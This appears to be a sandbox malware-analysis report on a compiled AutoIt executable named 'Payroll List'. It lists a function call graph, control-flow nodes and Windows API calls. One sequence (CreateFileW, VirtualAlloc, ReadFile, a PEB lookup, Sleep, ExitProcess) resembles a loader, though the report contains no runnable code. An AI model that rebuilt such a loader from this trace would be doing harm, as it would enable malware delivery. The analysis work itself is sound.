96185->96188 96186->96178 96189 14eaf6 GetLastError 96186->96189 96187->96184 96188->96190 96189->96178 96190->96178 96190->96182 96191->96121 96192->96134 96193->96136 96194->96134 96195->96125 96196->96128 96197->96134 96198->95672 96199->95683 96200->95683 96201->95676 96202->95696 96203->95698 96204->95694 96205->95703 96206->95708 96207->95722 96208->95718 96210 14f8a0 __ftell_nolock 96209->96210 96211 1240b4 GetLongPathNameW 96210->96211 96212 126a63 48 API calls 96211->96212 96213 1240dc 96212->96213 96214 1249a0 96213->96214 96215 12d7f7 48 API calls 96214->96215 96216 1249b2 96215->96216 96217 12660f 49 API calls 96216->96217 96218 1249bd 96217->96218 96219 1249c8 96218->96219 96223 192e35 96218->96223 96220 1264cf 48 API calls 96219->96220 96222 1249d4 96220->96222 96261 1228a6 96222->96261 96225 192e4f 96223->96225 96267 13d35e 60 API calls 96223->96267 96226 1249e7 Mailbox 96226->95546 96228 1241a9 136 API calls 96227->96228 96229 12415e 96228->96229 96230 193489 96229->96230 96231 1241a9 136 API calls 96229->96231 96232 16c396 122 API calls 96230->96232 96233 124172 96231->96233 96234 19349e 96232->96234 96233->96230 96235 12417a 96233->96235 96236 1934bf 96234->96236 96237 1934a2 96234->96237 96239 1934aa 96235->96239 96240 124186 96235->96240 96238 13f4ea 48 API calls 96236->96238 96241 124252 84 API calls 96237->96241 96245 193504 Mailbox 96238->96245 96364 166b49 87 API calls _wprintf 96239->96364 96268 12c833 96240->96268 96241->96239 96244 1934b8 96244->96236 96247 1936b4 96245->96247 96251 1936c5 96245->96251 96258 12ce19 48 API calls 96245->96258 96356 12ba85 96245->96356 96365 162551 48 API calls ___crtGetEnvironmentStringsW 96245->96365 96366 162472 60 API calls 2 library calls 96245->96366 96367 169c12 48 API calls 96245->96367 96368 124dd9 48 API calls 96245->96368 96248 141c9d _free 47 API calls 96247->96248 96249 1936bc 96248->96249 96250 124252 84 API calls 96249->96250 96250->96251 96255 141c9d _free 47 API calls 96251->96255 96257 124252 84 API calls 96251->96257 96369 1625b5 86 API calls 4 library calls 96251->96369 96255->96251 96257->96251 96258->96245 96262 1228b8 96261->96262 96266 1228d7 ___crtGetEnvironmentStringsW 96261->96266 96264 13f4ea 48 API calls 96262->96264 96263 13f4ea 48 API calls 96265 1228ee 96263->96265 96264->96266 96265->96226 96266->96263 96267->96223 96269 12c843 __ftell_nolock 96268->96269 96270 12c860 96269->96270 96271 193095 96269->96271 96375 1248ba 49 API calls 96270->96375 96394 1625b5 86 API calls 4 library calls 96271->96394 96274 1930a8 96395 1625b5 86 API calls 4 library calls 96274->96395 96275 12c882 96376 124550 56 API calls 96275->96376 96277 12c897 96277->96274 96279 12c89f 96277->96279 96280 12d7f7 48 API calls 96279->96280 96282 12c8ab 96280->96282 96281 1930c4 96310 12c90c 96281->96310 96377 13e968 49 API calls __ftell_nolock 96282->96377 96284 12c8b7 96288 12d7f7 48 API calls 96284->96288 96285 12c91a 96380 141dfc 96285->96380 96286 1930d7 96287 124907 CloseHandle 96286->96287 96290 1930e3 96287->96290 96291 12c8c3 96288->96291 96292 1241a9 136 API calls 96290->96292 96293 12660f 49 API calls 96291->96293 96294 19310d 96292->96294 96295 12c8d1 96293->96295 96297 193136 96294->96297 96300 16c396 122 API calls 96294->96300 96378 13eb66 SetFilePointerEx ReadFile 96295->96378 96296 12c943 _wcscat _wcscpy 96299 12c96d SetCurrentDirectoryW 96296->96299 96396 1625b5 86 API calls 4 library calls 96297->96396 96303 13f4ea 48 API calls 96299->96303 96304 193129 96300->96304 96301 12c8fd 96379 1246ce SetFilePointerEx SetFilePointerEx 96301->96379 96307 12c988 96303->96307 96308 193131 96304->96308 96309 193152 96304->96309 96306 19314d 96340 12cad1 Mailbox 96306->96340 96311 1247b7 48 API calls 96307->96311 96312 124252 84 API calls 96308->96312 96313 124252 84 API calls 96309->96313 96310->96285 96310->96286 96343 12c993 Mailbox __wsetenvp 96311->96343 96312->96297 96314 193157 96313->96314 96315 13f4ea 48 API calls 96314->96315 96322 193194 96315->96322 96316 12ca9d 96390 124907 96316->96390 96320 12caa9 SetCurrentDirectoryW 96320->96340 96321 123d98 96321->95412 96321->95421 96324 12ba85 48 API calls 96322->96324 96351 1931dd Mailbox 96324->96351 96326 1933ce 96401 169b72 48 API calls 96326->96401 96327 193467 96405 1625b5 86 API calls 4 library calls 96327->96405 96330 193480 96330->96316 96332 1933f0 96402 1829e8 48 API calls ___crtGetEnvironmentStringsW 96332->96402 96334 1933fd 96337 141c9d _free 47 API calls 96334->96337 96336 19345f 96404 16240b 48 API calls 3 library calls 96336->96404 96337->96340 96338 12ce19 48 API calls 96338->96343 96370 1248dd 96340->96370 96341 12ba85 48 API calls 96341->96351 96343->96316 96343->96327 96343->96336 96343->96338 96383 12b337 56 API calls _wcscpy 96343->96383 96384 13c258 GetStringTypeW 96343->96384 96385 12cb93 59 API calls __wcsnicmp 96343->96385 96386 12cb5a GetStringTypeW __wsetenvp 96343->96386 96387 1416d0 GetStringTypeW __wtof_l 96343->96387 96388 12cc24 162 API calls 3 library calls 96343->96388 96389 13c682 48 API calls 96343->96389 96347 12ce19 48 API calls 96347->96351 96350 193420 96403 1625b5 86 API calls 4 library calls 96350->96403 96351->96326 96351->96341 96351->96347 96351->96350 96397 162551 48 API calls ___crtGetEnvironmentStringsW 96351->96397 96398 162472 60 API calls 2 library calls 96351->96398 96399 169c12 48 API calls 96351->96399 96400 13c682 48 API calls 96351->96400 96353 193439 96354 141c9d _free 47 API calls 96353->96354 96355 19344c 96354->96355 96355->96340 96357 12bb25 96356->96357 96361 12ba98 ___crtGetEnvironmentStringsW 96356->96361 96359 13f4ea 48 API calls 96357->96359 96358 13f4ea 48 API calls 96360 12ba9f 96358->96360 96359->96361 96362 13f4ea 48 API calls 96360->96362 96363 12bac8 96360->96363 96361->96358 96362->96363 96363->96245 96364->96244 96365->96245 96366->96245 96367->96245 96368->96245 96369->96251 96371 124907 CloseHandle 96370->96371 96372 1248e5 Mailbox 96371->96372 96373 124907 CloseHandle 96372->96373 96374 1248fc 96373->96374 96374->96321 96375->96275 96376->96277 96377->96284 96378->96301 96379->96310 96406 141e46 96380->96406 96383->96343 96384->96343 96385->96343 96386->96343 96387->96343 96388->96343 96389->96343 96391 124920 96390->96391 96392 124911 96390->96392 96391->96392 96393 124925 CloseHandle 96391->96393 96392->96320 96393->96392 96394->96274 96395->96281 96396->96306 96397->96351 96398->96351 96399->96351 96400->96351 96401->96332 96402->96334 96403->96353 96404->96327 96405->96330 96407 141e61 96406->96407 96408 141e55 96406->96408 96430 147c0e 47 API calls __getptd_noexit 96407->96430 96408->96407 96421 141ed4 96408->96421 96425 149d6b 47 API calls __wcsnicmp 96408->96425 96410 142019 96414 141e41 96410->96414 96431 146e10 8 API calls __wcsnicmp 96410->96431 96413 141fa0 96413->96407 96413->96414 96416 141fb0 96413->96416 96414->96296 96415 141f5f 96415->96407 96417 141f7b 96415->96417 96427 149d6b 47 API calls __wcsnicmp 96415->96427 96429 149d6b 47 API calls __wcsnicmp 96416->96429 96417->96407 96417->96414 96420 141f91 96417->96420 96428 149d6b 47 API calls __wcsnicmp 96420->96428 96421->96407 96424 141f41 96421->96424 96426 149d6b 47 API calls __wcsnicmp 96421->96426 96424->96413 96424->96415 96425->96421 96426->96424 96427->96417 96428->96414 96429->96414 96430->96410 96431->96414 96433 124d94 96432->96433 96434 124c8b 96432->96434 96433->95552 96434->96433 96435 13f4ea 48 API calls 96434->96435 96436 124cb2 96435->96436 96437 13f4ea 48 API calls 96436->96437 96442 124d22 96437->96442 96441 12ba85 48 API calls 96441->96442 96442->96433 96442->96441 96445 12b470 91 API calls 2 library calls 96442->96445 96446 124dd9 48 API calls 96442->96446 96447 169af1 48 API calls 96442->96447 96443->95554 96444->95556 96445->96442 96446->96442 96447->96442 96449 19418d EnumResourceNamesW 96448->96449 96450 12403c LoadImageW 96448->96450 96451 123ee1 RegisterClassExW 96449->96451 96450->96451 96452 123f53 7 API calls 96451->96452 96452->95571 96454 12f130 96453->96454 96460 12f199 96454->96460 96563 12fe30 342 API calls __cinit 96454->96563 96455 12f3dd 96459 1987c8 96455->96459 96471 12f3f2 96455->96471 96502 12f431 Mailbox 96455->96502 96457 12f595 96464 12d7f7 48 API calls 96457->96464 96457->96502 96458 198728 96458->96460 96564 16cc5c 86 API calls 4 library calls 96458->96564 96567 16cc5c 86 API calls 4 library calls 96459->96567 96460->96455 96460->96457 96466 12d7f7 48 API calls 96460->96466 96497 12f229 96460->96497 96461 12fe30 342 API calls 96461->96502 96465 1987a3 96464->96465 96566 140f0a 52 API calls __cinit 96465->96566 96468 198772 96466->96468 96467 198b1b 96486 198b2c 96467->96486 96487 198bcf 96467->96487 96565 140f0a 52 API calls __cinit 96468->96565 96469 16cc5c 86 API calls 96469->96502 96495 12f418 96471->96495 96568 169af1 48 API calls 96471->96568 96473 12f770 96478 198a45 96473->96478 96496 12f77a 96473->96496 96475 12d6e9 55 API calls 96475->96502 96476 198c53 96583 16cc5c 86 API calls 4 library calls 96476->96583 96477 198810 96569 17eef8 342 API calls 96477->96569 96575 13c1af 48 API calls 96478->96575 96480 198b7e 96578 17e40a 342 API calls Mailbox 96480->96578 96577 17f5ee 342 API calls 96486->96577 96580 16cc5c 86 API calls 4 library calls 96487->96580 96488 198beb 96581 17bdbd 342 API calls Mailbox 96488->96581 96491 131b90 48 API calls 96491->96502 96492 131b90 48 API calls 96492->96502 96494 198c00 96517 12f537 Mailbox 96494->96517 96582 16cc5c 86 API calls 4 library calls 96494->96582 96495->96467 96498 12f6aa 96495->96498 96495->96502 96496->96492 96497->96455 96497->96457 96497->96495 96497->96502 96498->96473 96499 12fce0 96498->96499 96498->96502 96498->96517 96561 12fe30 342 API calls __cinit 96498->96561 96499->96517 96579 16cc5c 86 API calls 4 library calls 96499->96579 96501 198823 96501->96495 96505 19884b 96501->96505 96502->96461 96502->96469 96502->96475 96502->96476 96502->96480 96502->96488 96502->96491 96502->96499 96502->96517 96562 12dd47 48 API calls ___crtGetEnvironmentStringsW 96502->96562 96576 1597ed InterlockedDecrement 96502->96576 96584 13c1af 48 API calls 96502->96584 96570 17ccdc 48 API calls 96505->96570 96507 198857 96509 198865 96507->96509 96510 1988aa 96507->96510 96571 169b72 48 API calls 96509->96571 96513 1988a0 Mailbox 96510->96513 96572 16a69d 48 API calls 96510->96572 96574 12fe30 342 API calls __cinit 96513->96574 96515 1988e7 96573 12bc74 48 API calls 96515->96573 96517->95633 96519 134637 96518->96519 96520 13479f 96518->96520 96521 134643 96519->96521 96522 196e05 96519->96522 96523 12ce19 48 API calls 96520->96523 96635 134300 342 API calls ___crtGetEnvironmentStringsW 96521->96635 96636 17e822 342 API calls Mailbox 96522->96636 96530 1346e4 Mailbox 96523->96530 96526 196e11 96527 134739 Mailbox 96526->96527 96637 16cc5c 86 API calls 4 library calls 96526->96637 96527->95633 96529 134659 96529->96526 96529->96527 96529->96530 96531 124252 84 API calls 96530->96531 96585 180d09 96530->96585 96588 16fa0c 96530->96588 96629 166524 96530->96629 96632 180d1d 96530->96632 96531->96527 96537 13e253 96536->96537 96538 19df42 96536->96538 96537->95633 96539 19df77 96538->96539 96540 19df59 TranslateAcceleratorW 96538->96540 96540->96537 96542 13dca3 96541->96542 96544 13dc71 96541->96544 96542->95633 96543 13dc96 IsDialogMessageW 96543->96542 96543->96544 96544->96542 96544->96543 96545 19dd1d GetClassLongW 96544->96545 96545->96543 96545->96544 96546->95633 96547->95633 96548->95633 96549->95587 96550->95580 96551->95585 96552->95633 96553->95633 96554->95629 96555->95629 96556->95629 96557->95633 96558->95629 96559->95629 96560->95629 96561->96498 96562->96502 96563->96458 96564->96460 96565->96497 96566->96502 96567->96517 96568->96477 96569->96501 96570->96507 96571->96513 96572->96515 96573->96513 96574->96517 96575->96502 96576->96502 96577->96502 96578->96499 96579->96517 96580->96517 96581->96494 96582->96517 96583->96517 96584->96502 96638 17f8ae 96585->96638 96587 180d19 96587->96527 96589 16fa1c __ftell_nolock 96588->96589 96590 16fa44 96589->96590 96780 12d286 48 API calls 96589->96780 96592 12936c 81 API calls 96590->96592 96593 16fa5e 96592->96593 96594 16fa80 96593->96594 96595 16fb68 96593->96595 96604 16fb92 96593->96604 96596 12936c 81 API calls 96594->96596 96597 1241a9 136 API calls 96595->96597 96602 16fa8c _wcscpy _wcschr 96596->96602 96598 16fb79 96597->96598 96599 16fb8e 96598->96599 96601 1241a9 136 API calls 96598->96601 96600 12936c 81 API calls 96599->96600 96599->96604 96603 16fbc7 96600->96603 96601->96599 96608 16fab0 _wcscat _wcscpy 96602->96608 96612 16fade _wcscat 96602->96612 96605 141dfc __wsplitpath 47 API calls 96603->96605 96604->96527 96613 16fbeb _wcscat _wcscpy 96605->96613 96606 12936c 81 API calls 96607 16fafc _wcscpy 96606->96607 96781 1672cb GetFileAttributesW 96607->96781 96610 12936c 81 API calls 96608->96610 96610->96612 96611 16fb1c __wsetenvp 96611->96604 96614 12936c 81 API calls 96611->96614 96612->96606 96617 12936c 81 API calls 96613->96617 96615 16fb48 96614->96615 96782 1660dd 77 API calls 4 library calls 96615->96782 96619 16fc82 96617->96619 96618 16fb5c 96618->96604 96724 16690b 96619->96724 96621 16fca2 96622 166524 3 API calls 96621->96622 96623 16fcb1 96622->96623 96624 12936c 81 API calls 96623->96624 96627 16fce2 96623->96627 96625 16fccb 96624->96625 96730 16bfa4 96625->96730 96628 124252 84 API calls 96627->96628 96628->96604 96818 166ca9 GetFileAttributesW 96629->96818 96633 17f8ae 129 API calls 96632->96633 96634 180d2d 96633->96634 96634->96527 96635->96529 96636->96526 96637->96527 96639 12936c 81 API calls 96638->96639 96640 17f8ea 96639->96640 96663 17f92c Mailbox 96640->96663 96674 180567 96640->96674 96642 17fb8b 96643 17fcfa 96642->96643 96647 17fb95 96642->96647 96710 180688 89 API calls Mailbox 96643->96710 96646 17fd07 96646->96647 96648 17fd13 96646->96648 96687 17f70a 96647->96687 96648->96663 96649 12936c 81 API calls 96659 17f984 Mailbox 96649->96659 96654 17fbc9 96701 13ed18 96654->96701 96657 17fbe3 96707 16cc5c 86 API calls 4 library calls 96657->96707 96658 17fbfd 96661 13c050 48 API calls 96658->96661 96659->96642 96659->96649 96659->96663 96705 1829e8 48 API calls ___crtGetEnvironmentStringsW 96659->96705 96706 17fda5 60 API calls 2 library calls 96659->96706 96664 17fc14 96661->96664 96662 17fbee GetCurrentProcess TerminateProcess 96662->96658 96663->96587 96665 131b90 48 API calls 96664->96665 96673 17fc3e 96664->96673 96667 17fc2d 96665->96667 96666 17fd65 96666->96663 96670 17fd7e FreeLibrary 96666->96670 96708 18040f 105 API calls _free 96667->96708 96669 131b90 48 API calls 96669->96673 96670->96663 96673->96666 96673->96669 96709 12dcae 50 API calls Mailbox 96673->96709 96711 18040f 105 API calls _free 96673->96711 96675 12bdfa 48 API calls 96674->96675 96676 180582 CharLowerBuffW 96675->96676 96712 161f11 96676->96712 96680 12d7f7 48 API calls 96681 1805bb 96680->96681 96719 1269e9 48 API calls ___crtGetEnvironmentStringsW 96681->96719 96683 1805d2 96685 12b18b 48 API calls 96683->96685 96684 18061a Mailbox 96684->96659 96686 1805de Mailbox 96685->96686 96686->96684 96720 17fda5 60 API calls 2 library calls 96686->96720 96688 17f725 96687->96688 96692 17f77a 96687->96692 96689 13f4ea 48 API calls 96688->96689 96690 17f747 96689->96690 96691 13f4ea 48 API calls 96690->96691 96690->96692 96691->96690 96693 180828 96692->96693 96694 180a53 Mailbox 96693->96694 96700 18084b _strcat _wcscpy __wsetenvp 96693->96700 96694->96654 96695 12cf93 58 API calls 96695->96700 96696 12d286 48 API calls 96696->96700 96697 12936c 81 API calls 96697->96700 96698 14395c 47 API calls __crtLCMapStringA_stat 96698->96700 96700->96694 96700->96695 96700->96696 96700->96697 96700->96698 96723 168035 50 API calls __wsetenvp 96700->96723 96702 13ed2d 96701->96702 96703 13edc5 VirtualProtect 96702->96703 96704 13ed93 96702->96704 96703->96704 96704->96657 96704->96658 96705->96659 96706->96659 96707->96662 96708->96673 96709->96673 96710->96646 96711->96673 96714 161f3b __wsetenvp 96712->96714 96713 161f79 96713->96680 96713->96686 96714->96713 96715 161f6f 96714->96715 96716 161ffa 96714->96716 96715->96713 96721 13d37a 60 API calls 96715->96721 96716->96713 96722 13d37a 60 API calls 96716->96722 96719->96683 96720->96684 96721->96715 96722->96716 96723->96700 96725 166918 _wcschr __ftell_nolock 96724->96725 96726 141dfc __wsplitpath 47 API calls 96725->96726 96729 16692e _wcscat _wcscpy 96725->96729 96727 16695d 96726->96727 96728 141dfc __wsplitpath 47 API calls 96727->96728 96728->96729 96729->96621 96731 16bfb1 __ftell_nolock 96730->96731 96732 13f4ea 48 API calls 96731->96732 96733 16c00e 96732->96733 96734 1247b7 48 API calls 96733->96734 96735 16c018 96734->96735 96736 16bdb4 GetSystemTimeAsFileTime 96735->96736 96737 16c023 96736->96737 96738 124517 83 API calls 96737->96738 96739 16c036 _wcscmp 96738->96739 96740 16c107 96739->96740 96741 16c05a 96739->96741 96742 16c56d 94 API calls 96740->96742 96743 16c56d 94 API calls 96741->96743 96759 16c0d3 _wcscat 96742->96759 96744 16c05f 96743->96744 96745 141dfc __wsplitpath 47 API calls 96744->96745 96748 16c110 96744->96748 96750 16c088 _wcscat _wcscpy 96745->96750 96746 1244ed 64 API calls 96747 16c12c 96746->96747 96749 1244ed 64 API calls 96747->96749 96748->96627 96751 16c13c 96749->96751 96753 141dfc __wsplitpath 47 API calls 96750->96753 96752 1244ed 64 API calls 96751->96752 96754 16c157 96752->96754 96753->96759 96755 1244ed 64 API calls 96754->96755 96756 16c167 96755->96756 96757 1244ed 64 API calls 96756->96757 96758 16c182 96757->96758 96760 1244ed 64 API calls 96758->96760 96759->96746 96759->96748 96761 16c192 96760->96761 96762 1244ed 64 API calls 96761->96762 96763 16c1a2 96762->96763 96764 1244ed 64 API calls 96763->96764 96765 16c1b2 96764->96765 96783 16c71a GetTempPathW GetTempFileNameW 96765->96783 96767 16c1be 96768 143499 117 API calls 96767->96768 96769 16c1cf 96768->96769 96769->96748 96772 1244ed 64 API calls 96769->96772 96779 16c289 96769->96779 96784 142aae 96769->96784 96770 1435e4 __fcloseall 83 API calls 96771 16c294 96770->96771 96771->96748 96773 16c342 CopyFileW 96771->96773 96775 16c2b8 96771->96775 96772->96769 96773->96748 96774 16c32d 96773->96774 96774->96748 96797 16c6d9 CreateFileW 96774->96797 96778 16b965 118 API calls 96775->96778 96778->96774 96779->96770 96780->96590 96781->96611 96782->96618 96783->96767 96785 142aba _fprintf 96784->96785 96786 142ae4 _fprintf 96785->96786 96787 142ad4 96785->96787 96788 142aec 96785->96788 96786->96769 96812 147c0e 47 API calls __getptd_noexit 96787->96812 96790 144e1c __lock_file 48 API calls 96788->96790 96792 142af2 96790->96792 96791 142ad9 96813 146e10 8 API calls __wcsnicmp 96791->96813 96800 142957 96792->96800 96798 16c715 96797->96798 96799 16c6ff SetFileTime CloseHandle 96797->96799 96798->96748 96799->96798 96803 142966 96800->96803 96806 142984 96800->96806 96801 142974 96815 147c0e 47 API calls __getptd_noexit 96801->96815 96803->96801 96803->96806 96810 14299c ___crtGetEnvironmentStringsW 96803->96810 96804 142979 96816 146e10 8 API calls __wcsnicmp 96804->96816 96814 142b24 LeaveCriticalSection LeaveCriticalSection _fprintf 96806->96814 96808 142c84 __flush 78 API calls 96808->96810 96809 142933 __ftell_nolock 47 API calls 96809->96810 96810->96806 96810->96808 96810->96809 96811 14af61 __flush 78 API calls 96810->96811 96817 148e63 78 API calls 7 library calls 96810->96817 96811->96810 96812->96791 96813->96786 96814->96786 96815->96804 96816->96806 96817->96810 96819 166529 96818->96819 96820 166cc4 FindFirstFileW 96818->96820 96819->96527 96820->96819 96821 166cd9 FindClose 96820->96821 96821->96819 96822 d57218 96836 d54e68 96822->96836 96824 d572ca 96839 d57108 96824->96839 96826 d572f3 CreateFileW 96828 d57347 96826->96828 96829 d57342 96826->96829 96828->96829 96830 d5735e VirtualAlloc 96828->96830 96830->96829 96831 d5737c ReadFile 96830->96831 96831->96829 96832 d57397 96831->96832 96833 d56108 13 API calls 96832->96833 96834 d573ca 96833->96834 96835 d573ed ExitProcess 96834->96835 96835->96829 96838 d554f3 96836->96838 96842 d582f8 GetPEB 96836->96842 96838->96824 96840 d57111 Sleep 96839->96840 96841 d5711f 96840->96841 96842->96838

                                                                    Executed Functions

                                                                    Function 0014B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 744 14b043-14b080 call 14f8a0 747 14b082-14b084 744->747 748 14b089-14b08b 744->748 749 14b860-14b86c call 14a70c 747->749 750 14b0ac-14b0d9 748->750 751 14b08d-14b0a7 call 147bda call 147c0e call 146e10 748->751 752 14b0e0-14b0e7 750->752 753 14b0db-14b0de 750->753 751->749 757 14b105 752->757 758 14b0e9-14b100 call 147bda call 147c0e call 146e10 752->758 753->752 756 14b10b-14b110 753->756 762 14b112-14b11c call 14f82f 756->762 763 14b11f-14b12d call 153bf2 756->763 757->756 793 14b851-14b854 758->793 762->763 774 14b133-14b145 763->774 775 14b44b-14b45d 763->775 774->775 777 14b14b-14b183 call 147a0d GetConsoleMode 774->777 778 14b463-14b473 775->778 779 14b7b8-14b7d5 WriteFile 775->779 777->775 797 14b189-14b18f 777->797 782 14b479-14b484 778->782 783 14b55a-14b55f 778->783 785 14b7d7-14b7df 779->785 786 14b7e1-14b7e7 GetLastError 779->786 791 14b48a-14b49a 782->791 792 14b81b-14b833 782->792 788 14b565-14b56e 783->788 789 14b663-14b66e 783->789 787 14b7e9 785->787 786->787 794 14b7ef-14b7f1 787->794 788->792 795 14b574 788->795 789->792 801 14b674 789->801 798 14b4a0-14b4a3 791->798 799 14b835-14b838 792->799 800 14b83e-14b84e call 147c0e call 147bda 792->800 796 14b85e-14b85f 793->796 804 14b856-14b85c 794->804 805 14b7f3-14b7f5 794->805 806 14b57e-14b595 795->806 796->749 807 14b191-14b193 797->807 808 14b199-14b1bc GetConsoleCP 797->808 809 14b4a5-14b4be 798->809 810 14b4e9-14b520 WriteFile 798->810 799->800 811 14b83a-14b83c 799->811 800->793 802 14b67e-14b693 801->802 812 14b699-14b69b 802->812 804->796 805->792 814 14b7f7-14b7fc 805->814 815 14b59b-14b59e 806->815 807->775 807->808 816 14b440-14b446 808->816 817 14b1c2-14b1ca 808->817 818 14b4c0-14b4ca 809->818 819 14b4cb-14b4e7 809->819 810->786 820 14b526-14b538 810->820 811->796 822 14b69d-14b6b3 812->822 823 14b6d8-14b719 WideCharToMultiByte 812->823 825 14b812-14b819 call 147bed 814->825 826 14b7fe-14b810 call 147c0e call 147bda 814->826 827 14b5a0-14b5b6 815->827 828 14b5de-14b627 WriteFile 815->828 816->805 829 14b1d4-14b1d6 817->829 818->819 819->798 819->810 820->794 821 14b53e-14b54f 820->821 821->791 830 14b555 821->830 831 14b6b5-14b6c4 822->831 832 14b6c7-14b6d6 822->832 823->786 834 14b71f-14b721 823->834 825->793 826->793 836 14b5cd-14b5dc 827->836 837 14b5b8-14b5ca 827->837 828->786 839 14b62d-14b645 828->839 840 14b1dc-14b1fe 829->840 841 14b36b-14b36e 829->841 830->794 831->832 832->812 832->823 844 14b727-14b75a WriteFile 834->844 836->815 836->828 837->836 839->794 847 14b64b-14b658 839->847 848 14b217-14b223 call 141688 840->848 849 14b200-14b215 840->849 842 14b375-14b3a2 841->842 843 14b370-14b373 841->843 851 14b3a8-14b3ab 842->851 843->842 843->851 852 14b75c-14b776 844->852 853 14b77a-14b78e GetLastError 844->853 847->806 855 14b65e 847->855 864 14b225-14b239 848->864 865 14b269-14b26b 848->865 856 14b271-14b283 call 1540f7 849->856 858 14b3b2-14b3c5 call 155884 851->858 859 14b3ad-14b3b0 851->859 852->844 860 14b778 852->860 863 14b794-14b796 853->863 855->794 874 14b435-14b43b 856->874 875 14b289 856->875 858->786 878 14b3cb-14b3d5 858->878 859->858 866 14b407-14b40a 859->866 860->863 863->787 869 14b798-14b7b0 863->869 871 14b412-14b42d 864->871 872 14b23f-14b254 call 1540f7 864->872 865->856 866->829 870 14b410 866->870 869->802 876 14b7b6 869->876 870->874 871->874 872->874 884 14b25a-14b267 872->884 874->787 879 14b28f-14b2c4 WideCharToMultiByte 875->879 876->794 881 14b3d7-14b3ee call 155884 878->881 882 14b3fb-14b401 878->882 879->874 883 14b2ca-14b2f0 WriteFile 879->883 881->786 890 14b3f4-14b3f5 881->890 882->866 883->786 886 14b2f6-14b30e 883->886 884->879 886->874 888 14b314-14b31b 886->888 888->882 889 14b321-14b34c WriteFile 888->889 889->786 891 14b352-14b359 889->891 890->882 891->874 892 14b35f-14b366 891->892 892->882
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abb0a25bac4b21ebe4eb7738fcac0baadc4b08a4e3e2e6751b5cf667ff5269c1
                                                                    • Instruction ID: 32675cfc39ab764c5d4ffe1c571311f5f8fac1934c244e0140751e0c7d33748d
                                                                    • Opcode Fuzzy Hash: abb0a25bac4b21ebe4eb7738fcac0baadc4b08a4e3e2e6751b5cf667ff5269c1
                                                                    • Instruction Fuzzy Hash: ED326B75B062298BCB25CF54DC81AE9B7B5FF4A314F1840D9E40AE7AA1D7309E80CF52
                                                                    Function 00123D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00123AA3,?), ref: 00123D45
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00123AA3,?), ref: 00123D57
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,001E1148,001E1130,?,?,?,?,00123AA3,?), ref: 00123DC8
                                                                      • Part of subcall function 00126430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00123DEE,001E1148,?,?,?,?,?,00123AA3,?), ref: 00126471
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00123AA3,?), ref: 00123E48
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001D28F4,00000010), ref: 00191CCE
                                                                    • SetCurrentDirectoryW.KERNEL32(?,001E1148,?,?,?,?,?,00123AA3,?), ref: 00191D06
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001BDAB4,001E1148,?,?,?,?,?,00123AA3,?), ref: 00191D89
                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00123AA3), ref: 00191D90
                                                                      • Part of subcall function 00123E6E: GetSysColorBrush.USER32(0000000F), ref: 00123E79
                                                                      • Part of subcall function 00123E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00123E88
                                                                      • Part of subcall function 00123E6E: LoadIconW.USER32(00000063), ref: 00123E9E
                                                                      • Part of subcall function 00123E6E: LoadIconW.USER32(000000A4), ref: 00123EB0
                                                                      • Part of subcall function 00123E6E: LoadIconW.USER32(000000A2), ref: 00123EC2
                                                                      • Part of subcall function 00123E6E: RegisterClassExW.USER32(?), ref: 00123F30
                                                                      • Part of subcall function 001236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001236E6
                                                                      • Part of subcall function 001236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00123707
                                                                      • Part of subcall function 001236B8: ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 0012371B
                                                                      • Part of subcall function 001236B8: ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 00123724
                                                                      • Part of subcall function 00124FFC: _memset.LIBCMT ref: 00125022
                                                                      • Part of subcall function 00124FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001250CB
                                                                    Strings
                                                                    • This is a third-party compiled AutoIt script., xrefs: 00191CC8
                                                                    • runas, xrefs: 00191D84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
